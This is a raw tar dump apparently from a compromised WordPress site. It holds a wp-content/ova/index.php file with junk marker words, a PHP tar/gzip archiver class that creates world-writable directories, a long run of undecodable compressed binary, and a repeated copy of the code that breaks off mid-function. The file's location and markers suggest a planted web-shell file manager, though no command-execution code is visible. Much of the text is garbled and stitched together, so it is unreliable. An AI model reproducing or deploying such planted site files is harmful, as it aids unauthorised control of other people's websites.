tasslihorec sfaxoistadet bintestcss index.php.tar000064400000237000151442366610007163 0ustar00home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php000077700000233524151442114030021417 0ustar00tasslihorec sfaxoistadet bintestcss <\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } index.php.php.tar.gz000064400000061411151442366610010371 0ustar00z"I(xnUW.@"%f<:D@,lsӧ\E?\b900n̔+b*/x[,VcE}K5EY^ eI%+H#~_N'p8`4H CH0USPmq* SY?, xqU??}F#OoLΌc'2YY ]4A7I֘ᔓ&<$݇jWؓ)H//KQzF \"l72BI% ey./Jŋ Jq;PuK }"O[Kj[s$Q!ʘjR~ffdQX,g h XEL}̒ng@BDѹ roG,r6O#$As at<_JKHu)r;9Wh2,e*L"Of4Eq,y*5)D4y2y[ -miF$BKTM@spc&2jE$H1 W1'y`_H2vHߋ<QmDtk}< M蛩>rfۢo\ԕp0 L}7w Z/0:*Y-^i;'24ⅆ9.eEs[943p/Vh@? *6y/$ݍEAڭ#Kәt+߂6 Qf@M$U-rhz陬kx͢dQu$2 U薎o}tȊ漵q5EE&AX;^$.ٲꖄD90_J#DTdlbB(irE = 2ٛː[ V8&w``-_5'-8< ?k0* LJpiT_ɛ)͚> T_Uf!dpTM)i"f$ :z-nGg0] /X2fb1^۶i95ayc@^a1+#jcЖ%y fTHmKN"<#U "$a6ZzmNc6"?12}¡!Ԣ<л<躜F,8 (!#Kh_F#Hn+hoCK*46@>(Qt^xG2?~PB|8 G!>h< @OD9P]+Z*H ⩜bH##b\>f! 2AAK+㵿Ba?A۹]3?c]Ӧb_F'jqA뫇E(£wyk 0ZHF3b:zb?8 J/x Y͚Ik4 7+i㻌~P>]zcƒ4 0p-b .&u筏L;O=H&Bթ;-$aLAw)GI jDe-4is`I4( ̪Ш4qJP 4H- `ճy22;ĩj.3+v+Ϝ8J H ث^@UuٱY*vw 9[QudHf `/@*GdT~Ƀ'.ncjR1װyf3#bB?X5Yb3x9Az 60T 12`LfڽKU؝E7UPp K@aNw]`oI@7Xuد~`D+_\wv%JZ줋yDA3 :/h .0hh#a`FZi A.é IA\D p0PA>"FQ..#IBlNÿ;cac=*?!#SKĜ5sC *8 ʔ6`p/.Rfsh=POxS-ީUuenTwd%Kv˂O S- V?]G3@C@ :RA{Bļ)usa%L/̖}ZSͷz>JZ.OVdxR//R%B=\" IP~"?oϗno=ϗߟ]7GMq]^%pHc0AJ|GJCaۥow!w>c1ƍOO(^`ܟb^^.E!~ ;5mZ@MM,2P/𘽱+ 38c };%r`3"%QBƌ`1K^YNB+EIl41O϶6>G\ҋ:!L 7+fIGB2m9r4.p?!-Hi'b )0 P| `pl]'@,P1 猺Ht0b8 l,5v_@ BY K lifHsIH΢:-Jf3hΨdm#PCK!&>#U:6O=e#P;9غs}Ph")*|& $N&DQVkFߛ@z<՛ET{7F7A7ڙ'pQ&$ ES)c kv+S^hkۡtXթۃc̫K)AT3u=dc.) 0e$D]P0KF1Z U$D8c D&]EYqkHݞcY{ؠ?D*k >R#ji=75c8G@ l%|utKTUHj NT$jn\S*E, Ґ1i| Ĭ2\~7@>> oA5j%?ĭpLlbcLPl4Ao ]K? +ûצ(u^0-j֢M ffυ@H_]F]_*r{.hnDhfwȢXd,a7'C#];[ [?1޴J)W-C68 َcH!D Dv# <731p䨋ڗ)]T@de֨Q庶gҳƋs}wC5TENs5{cSy#A7|8"-B% I &`!\40ڋ9_A=b80Ki]̍H.]7wP!GWC>#zf)Đ*& axژ%i^JU4v諗nMkg .NTnM)薆9x/{WݕpS?+r #w}pFAtR>;b}dɉk%KYQSQbAY].YcjekV]TQ+ %eЅm$.4JaAEX=>z),~7pv%.]tF ˰[#V 5E 7׹<X+'F2hݿXCDn1.HT gphpyd;7F Fسn'㘥֜;Dwx/M Bqz೬G۫3i3*x2bYh)RIIl=U[hYq!6lIŸ?d<:˒]Kdۮ35DUrʥol!HRFj;Xi΄'m{,;8L>as87U4dɁ‚Շ|&r:TeG3ϨޱqC Dik>x-y1A$ -\Z!qU$,53@ϜHmL(I,5+#NB@cxqkrzNc9@J%\IfOE_ YjDļm0n$>XXW[@@b)C 8tKer8]J2>57rq"_ՙ;t#~_H!Seڝ|:]fKc9@f]hq8di@hxǛX"P; ?idTL #;& T\(stxS&hBRx. pnX s.J9w.ezqДLR}H>aCx%Gpx73=o"4OW1n~MJfRG>kG I#dBxߙh>ygRқ:Su0賬mh7?;#iVV8#l6鬲6s}}+dJ{FJ͊>3?)#pyKTarp N)3듦~FjA^~"ۏ0g3$N`pcVV3abSэR+60`%wp|KKV`b6S2rIRoڵ*;9{"M;# 2<Lj}Zmr(1#\Mώ]~;v8ɿBQ4ֳM'Ϡ@X|zI]r"[㠛c]"& ǰL;'Лh! ~yYߴF]Dq"ggNc!uiraPW_)(~]Z2,%nbДF,"dsDN~L*r/ؼ FYW~g ;GȺR̷P"g5Nx^H @4yp}P~{8ﲸ}2'rZ"s?Rڱ:qBt~d+\0#Xe9l+pyA'l]?hq|j]J(0!>6+egO ЀI4ESnKu0|b4:5?_?PWf.5Gp?1R~Ƿ-O[Snxs2oF2bMfwD*8\5fn?M|H%0&w|14 oGH `2h%ӥ̨Ov,Nqm*ͺeX?_aEtM%Fr0c!U1zk7"ScsH–^p4=0u= d1kII}꼷c oߙ1v0Ar]8(YXFaOR}}PlmX LLvn\_9om/0yv7_FG9;C0)vk; +ߐF ދصR߸i ?Y13'F` Qxze|ӣѫrߘ4:qqD 1Nz:TI3`ڛ9H za%p=aCV̔S|QDV rw7omPJ0|xQ0/xv0_/b"C}R6J\2CZ7`d[^r#ijC+'8 :䐶pg8VRsa q&Wsr;_-& >3(.AXŧTJQB2OB{{dSa\:\>veUooA % Bf^~rtAVAzsjȺugЭ~B#t%Ь[#F&#Xô2+!cE]}ytœ54weUقgQGクuHˊIr{ RDb’1&!]oس Zrn渄u*\@ 7񻡰1?"Ai4׆"Vos(0ignFf_F8V7sM[iFT33KrXcRS,ZROa|`A bğ;?H8]%AUD/u~W;sHh wsˡ}}L-.N6| ab][`|=O\4;y:|rc5ƐR.cU؋G8L G @^u#Qdh98vTT1}c©zDRGM[9KeCi&rM1ma qvȞ-ɉNenjb̦?[iƥp 9hh.۵PehLw ,6OF9'& -m黛G7:d{@J-|>Q?RCE'dIn r5U6ͨ, a n@4Q$\M [iG `'I& (h=A1<7>u䟲NR:e*؏j` >;E4yC._HW_vΈVl-v(4!vZ4Ϊ6{j#\4 p⊿Oev^44-%J/=e;J`j)4B*4uQPTjZ6.ժpViB|w79Ty\3_7;̷;jP%浍[~5m#e*+ _ܪ2\>#:{|򟯿t"hM09tI.8?heȉ",Sh _٠}M]rcn=P>]~'Nng>ȲAS J#y3?N -Q[ϩcc[矀jāxav}5x6?,p؜ AEQ5w +Dҝy*5捖&|.Χ}?[سL>s֓t>T\_2;vîKqea&0oO+Rgbyy~(o2]Uz,]HkbZ{t);ދt#3n6~oOޕtaIgVMW'Z:t%N?jK'():tGJj$]jQbB&-]׆+4Š[hWdm&8zL#~>*o^~L5N lмLz5^ʱPNLh1%QdwBO{C2B`y+Y(94姉>J_)NZI\nwD=8W~G6? OqTڈlUS$H%.ܗ^.SM6>.wh~Z r +,v|}ʝH0ߣI!r<숁urw ;i({OzMGM= wtd=L q)'IQE0Mlܣҟ/ZF:4o+bٻ,"K͔Lȶ3>3>e?i&]ww26Ghvir%=LG͂fre6]z8!]q2M&OS4,2}6w/d\oV;mG^vJnn\J'4-|Md+íX*:p'Wtn.͢@2,'jzl衯'jQ"Wm= j壍}uӟ%"{ 'T.Ope,zvewj=Zs+690XЃR|҈fYzʎ釥NRlayWm% 䁖œIJ- 6AXN 찏ؒ 3Nvw;oFxrOjNSj|BNvN>+Jŧ< Cnv?-e5\ڃŢM\\΃}`Wp|AVҋ{UorKQ5eOrH pĠkzl\<S$/m⹭.B֞zM׵E(4~,HHkդ.l;p:zxsW-kZ/z=.$JhosP>ӦJ5+uk@`$B|t~ߊT*[Y.fyTnB,~-FɡW2.Rbv ]ꥆ7ӌl6>c.Zo~I*풳JW4zN>x#M8<]Ȇwq%[lMٰYidSkꉞ`W=ED+J.Zcq. Yo5^"n^nxY -LKjmOKZi4ӫU{ڣc-+IٻTfU+B<ɪj|mJ1:yeG/,R1Wɇ^5g7߫x=ؚw͎WlZe==yf|^ ^}zc40bĉֹu^]iwӧ*{ W`v;ǥ)8+ cM&d%M4lP{kh=츐d ;aܫz<4Pߎpoܭpu%W;~H 8h 6\E[^4xkmI+x'5~:XU zucq-П5x'Fki'mPbNcdЍ뵶yGZN&mo3QKlhUv<ϷMٞ->+#bo596]OX6k?D*@v ji0}7ʋfc<̦7Ňh<%i4sqKT-h&x2w붾xo:H" ~|?(g|Bs'&E0T~/z.JLn~H6ljxva^RI j aKY.᭵Z}5Ny\>B/w𓚬QB>kltPz$0Z=޴CM?MWbwa^_> ѝ瓛\֍qs?-hcmfk!*bۙ[/8ZЫ}Sfh=~\HW҅ʻi Ji2eaЙŽk=,3w7SIVP}V~,|;OfHoEO7ě^] KjNV38JDJqqmԸ/qn[x|KrBML[*ri'6cRf˃ZX5wN^/,@=!4Csx]U}vrbiDx$Y$ A$-C&lu"/Xd"?l!Ba -[?l!Ba 򯱅'ѧ|fsj ?v##%7nOCHD\^@ $6*i%L{lFN;ƻq24n65llBB8hn?MJKUN|:NՇcܬlu=.vxYƧ۫Ql=f]5&֡ [wddR-E#YY@Z\ZLc%on5Ƴ0/McQ-BTҫOrl`)#Mq!ǤffR_K,5'"swO:Vd>[Fu|Q|Rw+Y}WѲ[ޛOzI'dtcVmY1+w|[cP1}XI-}$}&FJ1w;l(>|/,MՁBG(4·5{nM@XZjzCp2<BɝI|aS˽~'VpܫwjHڡݪ B̓C2fӧ\-˵F"1Z <ñKKm.E)SM 6YU{.ؿTsYa٦nBJ/~$n4fNބc"ެV64quXx/FHuS92YƦWcf,QPXGXdU_f3d7` Mklb>d8BB$X6j8EmԞJiUGtBiXKUv꾕r;Yo"zEؔDe[$xv]^EK @";ǹQb]%+Z'u~īD!oBe7e%< XDjT``OS=6IdU! xQ\Քi9Mf6*Dxh82Qegflk^ZќRnw={D=`m/D^^M)Gel,>5 w B]I&ދft8:^f)EQ7VXzyt:6d]Reh/gZf 񬯷w؋WmOVZl!4\ 5n{^jVE \@;iψAt?Fb&H.Gar^4` ՞:S w|쩙r6;xHUIQYSiQ/=eC sM. >/W^=ڥuT=Ja7_mBaiTkOH=7z&-Bp7:L`nuf9J)yQ K8&{m'u<Xn=؀cb.מ!{UO| 6I@3)W y!R)wzr] 2t '.?&+a“k`|v?4>XnF].R 3֢$jH6S F$dO(e1 ĭB9Cq*m xB~!!,N=enl1N˦e ęQϰ uC.)aяHyE{!-C[?۳xW`Gf'+xY8Nv>ůh>B>jM&|bNW^9HC>i's#]CsЋ<Ϸ^Z x `3\ǙZ7kɲy^2͌jjMۚq ﯷ{pDSD'$Q 'o~,8o7.p V?{;ɗ0#d4OKpsdY<W`?3wع7AKEpNJlw::^s+eХn ,9sa?Ӝ} _HA| 5m|9FI*C= x2և1 9bIPw"">MTs@8cC;9''Z4]_̑,pnN>Ov_@<>ԯӽ76/t͞$uԟNjQ \n.9ӠPIfbSe]8̟%ƈW5A".]8qJ@QXD6(#`mŮn lʴ!A6;J:43> ;qBjY*?sWȧЦ궾rR ]7806ǟdQC\϶[=lq: f|NUF"P]_gv̺ݓ%SC%i44NqwFeBEN3lY u\z'DsKeo|s-6KWU7@.}KyP|M$;-ۇ x1x,r;V$AֲeY捕ucycoȇ^/}Nڛ |G'7)2+}II$@=Mn-ݶ<OChӇjLG9N<b.'_w2$xfŽ|V xVypL5u lōfxz]0Dc鐘i鷀T7liSĆCm/ަgAӂiI iisTLpQ OjzѐL.63 VUY8=̣F/ƩYYg\|Nb,kxp6H*Q Rpn?<7?_7S|*,*#Av/˂ x34ЂgvGX&"<.tJfl_F:&( M I,L$Lj`C/D< +,eɶf"Lhxv dQu$} Qбb&dTİ/BȐv6!XY'|ptыV\Gl nrhǫ'-i) IJ֊5'p(pcYkb jK]gR^KDX$#j*ԳR> UԎW},KJ}DWOhn^Hڳ?"Ge~t._9ἰ bq#:;>CR8m2S `N-1KJ1Bjl'aCdZ{k| k/3Ds,H[]Mv,ؐAdk)W#clƓMRS5;G%NLH`Ԛ򼆶^ʃSJ ]jA^ޢa\$; Dt*0 Yh/Z#X12 ۔uBNpjV(g CB+vqF`GX5 th]xrbv- Aǭgɒ]ŷJS{8UiuL#}`~ a8*)c**fc> c@1!p~>1 ?"D0^HO!.-`(2C$$BAk4Ka-e>}boƃpq\jJ0" FUHbe7̿z<''f ŀ w_\#l8PxB?T -c#v?1ݦs5ֹ3b`\e QR%BZNί^aD X@B5度Qāf߄2aM^Ӈ/hL Uf_o?!kLGYdyHPaQ 8KPYF}@Z"ȣ4Lqmb/,/E WW<|҅5w`{77ABnqZ.\%.[>w+dany?lAS}| V3 zUucGUmՇ__o=GZ c㸱km#jyhhێzp0mmj[Tms]At#kPPɏ_ ?,֜9HVޢ'pNng? ,˔L %^^@tQAT鈦q`;O[֑"/&K*bn}PÅ ?aC6ۈކ:`r+8..R쀙HbȪ#QP{ #ep>X A:H~q(4#:|2%.tiLa^vq1~ʩFvy@ 3=gO{hMk <9rdS XY6~38@~D0#Lt|^tH x| 晃nBo׵˂i16.7cN$?b^G4j$k4qx9*r13Q.њų \2 ҵ IPmna- sT6Q:5_ǁ> &7mCN<0֎q HZВ.,I{&flpsjۊOc)0ؓ8;I0K"~ژhq0GsQsbqbk?+3uQ6@-NM~>?>2u>3sv!X!BCb)2ix@^z~Z6n]F3U|RF,=Źk\Ҹ5}Z 9/}nSP0l^3zJ9,ɿƭ-lcG*_rdN "ZF} M퀖68U$f]π`<;NSкtt,)gzUٸ|7QG)= F Wxy%Q2-D.Wl%N j\38 gyRtc؟bvh y+0~gPww$DIBH #O+Yy}QUñ3@I$S*[f(Tk~jG1HF,g*&[NrV:~`$+AEUDcӅ?^{OM@6H 5'ZS! PV&UvdKǭgXrѥQs'&'+ؗ(KK=~< f0'byC;NNx<Ǝ{^?Rے]^a>`l%LL9t0ckkqI#<0%P1˷_5]` ـ\G n]$x{ӂk2!c1W 9odַ,p%WPL`ٺ{¡.,=,DPz*^o1ţo:xg\$NJ"@ۤ)$Kţ{&~?r0/\#.11rY׏?A;;dA8ab2Ƃ`ޓkӧn$6fa8|܄ A0!)ƫ#~(ˊ\`mfɄqd&" *#.ǥ8=SVijlִ8a=s( J6d`-]c;|"E1>\rk*h'Q6(sX U'T:m48F]TAB3 5۴ 1dbmDO;jؠf|}VYK.D55>#| KL s: ``3VlC FBg+#ߵ91tɦ|]ne( ,ɩOyE]Yyqa?А' i0A>9ԶnLb%QT7\Kb~D~fK o Sc|c:)!}Eb'p# 86񵙓o EnB=)XD@ߚZ-ק9ǛBW6i!: o&x'- 5&Y_Lf.fvM`տ4IF?Cﲤ0x:gNѶͪ>u M98l=ƌ`fpt_3q8mx{d_ !޴e1<)qT" @e/L f818a9y醿G õF7{S22C%`y`Q-; QERUD]hn =$on  b\b!^z(ď~u,d@,U-0d|rNZ &^p3Y$+;11FĨ ?tkpg/f ox ,]0kΤP4vjؑF`X}8ɘa aCvvQq<{q(  4N msVy"tfQ,uXݘoԷ0)q2?*yՊƗn3p^ KC C+$q!Dd4E<'1g8B3gv9И&sĚ1@:O&`o6 ޜA.c1!@`LA8H12]FUNo03[szJƷud|rucՏJ(9</(Z[-vkY~0ss-yep-nQKEq9уĉYa 76N~.s9dɯcuȎJ[1| Ǔ.ЛArl<5'e> r|ƵwG$L}4$ Wk\o!l*$`fpL1nߨoz0R.Y ev#ոIⰞr@|?iY$5l3:psNyr|i84۫:)nF9*㛜ԩԨ"l ]HWW jT7Sl ~Wwt{tqηݜfD|i? R_ko`\@][8@ | ?OF>index.php000077700000233524151442366610006414 0ustar00tasslihorec sfaxoistadet bintestcss <\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
